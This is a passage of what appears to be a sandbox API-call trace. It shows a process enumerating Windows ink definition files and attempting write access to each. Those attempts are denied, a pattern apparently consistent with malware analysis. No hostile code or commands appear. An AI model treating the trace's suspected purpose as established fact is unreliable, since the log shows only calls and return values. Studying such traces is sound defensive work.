shared\\ink\\fsdefinitions\\main\\zh-dayi.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.497] GetLastError () returned 0x5 [0083.497] GetLastError () returned 0x5 [0083.497] SetLastError (dwErrCode=0x5) [0083.497] GetLastError () returned 0x5 [0083.497] SetLastError (dwErrCode=0x5) [0083.497] GetLastError () returned 0x5 [0083.497] SetLastError (dwErrCode=0x5) [0083.497] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f008 | out: hHeap=0x20000) returned 1 [0083.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0083.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0083.498] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.498] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.498] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3af7a2, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3af7a2, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3d5a11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2ac3, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="zh-phonetic.xml", cAlternateFileName="")) returned 1 [0083.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0083.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0083.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0083.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0083.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0083.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0083.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b110 [0083.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x5a6b8 [0083.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b110 | out: hHeap=0x20000) returned 1 [0083.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81b40 [0083.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.498] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.498] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.498] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.498] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81b40 | out: hHeap=0x20000) returned 1 [0083.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.499] AreFileApisANSI () returned 1 [0083.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml", lpUsedDefaultChar=0x0) returned 86 [0083.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0083.499] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.499] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0083.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0083.499] AreFileApisANSI () returned 1 [0083.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x719c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 86 [0083.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xac) returned 0x819d0 [0083.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x719c8, cbMultiByte=-1, lpWideCharStr=0x819d0, cchWideChar=86 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml") returned 86 [0083.499] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0083.500] GetFileType (hFile=0x340) returned 0x1 [0083.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x819d0 | out: hHeap=0x20000) returned 1 [0083.500] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0083.500] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0083.500] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0083.500] CloseHandle (hObject=0x340) returned 1 [0083.501] AreFileApisANSI () returned 1 [0083.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x719c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 86 [0083.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xac) returned 0x81d68 [0083.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x719c8, cbMultiByte=-1, lpWideCharStr=0x81d68, cchWideChar=86 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml") returned 86 [0083.501] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.501] GetLastError () returned 0x5 [0083.501] GetLastError () returned 0x5 [0083.501] SetLastError (dwErrCode=0x5) [0083.501] GetLastError () returned 0x5 [0083.501] SetLastError (dwErrCode=0x5) [0083.501] GetLastError () returned 0x5 [0083.501] SetLastError (dwErrCode=0x5) [0083.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81d68 | out: hHeap=0x20000) returned 1 [0083.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0083.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0083.501] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.501] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.501] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0xaa, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x5a6c0, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0xaa, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓⫃")) returned 0 [0083.501] FindClose (in: hFindFile=0x78510 | out: hFindFile=0x78510) returned 1 [0083.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0083.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0083.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0083.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0083.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0083.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0083.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46668 | out: hHeap=0x20000) returned 1 [0083.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0083.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0083.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0083.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b110 [0083.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x5a6b8 [0083.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b110 | out: hHeap=0x20000) returned 1 [0083.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0083.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.502] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.502] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.502] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.502] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.502] AreFileApisANSI () returned 1 [0083.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main.xml", lpUsedDefaultChar=0x0) returned 74 [0083.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0083.502] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.502] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0083.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0083.503] AreFileApisANSI () returned 1 [0083.503] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0083.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x85080 [0083.503] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x85080, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main.xml") returned 74 [0083.503] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0083.503] GetFileType (hFile=0x42c) returned 0x1 [0083.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85080 | out: hHeap=0x20000) returned 1 [0083.503] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0083.503] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0083.503] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0083.504] CloseHandle (hObject=0x42c) returned 1 [0083.504] AreFileApisANSI () returned 1 [0083.504] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0083.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x85120 [0083.504] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x85120, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main.xml") returned 74 [0083.504] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.504] GetLastError () returned 0x5 [0083.504] GetLastError () returned 0x5 [0083.504] SetLastError (dwErrCode=0x5) [0083.504] GetLastError () returned 0x5 [0083.504] SetLastError (dwErrCode=0x5) [0083.504] GetLastError () returned 0x5 [0083.504] SetLastError (dwErrCode=0x5) [0083.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85120 | out: hHeap=0x20000) returned 1 [0083.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0083.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0083.504] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.504] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.504] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cdb88, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a37a4cb, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="oskclearui", cAlternateFileName="OSKCLE~1")) returned 1 [0083.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0083.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0083.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0083.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0083.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0083.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x5a6b8 [0083.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0083.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0083.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.505] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.505] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.505] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.505] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.505] AreFileApisANSI () returned 1 [0083.505] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui", lpUsedDefaultChar=0x0) returned 76 [0083.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0083.505] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.505] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0083.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0083.506] AreFileApisANSI () returned 1 [0083.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0083.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x98) returned 0x85260 [0083.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x85260, cchWideChar=76 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui") returned 76 [0083.506] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskclearui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.506] GetLastError () returned 0x5 [0083.506] GetLastError () returned 0x5 [0083.506] SetLastError (dwErrCode=0x5) [0083.506] GetLastError () returned 0x5 [0083.506] SetLastError (dwErrCode=0x5) [0083.506] GetLastError () returned 0x5 [0083.506] SetLastError (dwErrCode=0x5) [0083.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85260 | out: hHeap=0x20000) returned 1 [0083.506] AreFileApisANSI () returned 1 [0083.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0083.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x98) returned 0x859e0 [0083.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x859e0, cchWideChar=76 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui") returned 76 [0083.506] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui" (normalized: "c:\\program files\\common files\\microsoft 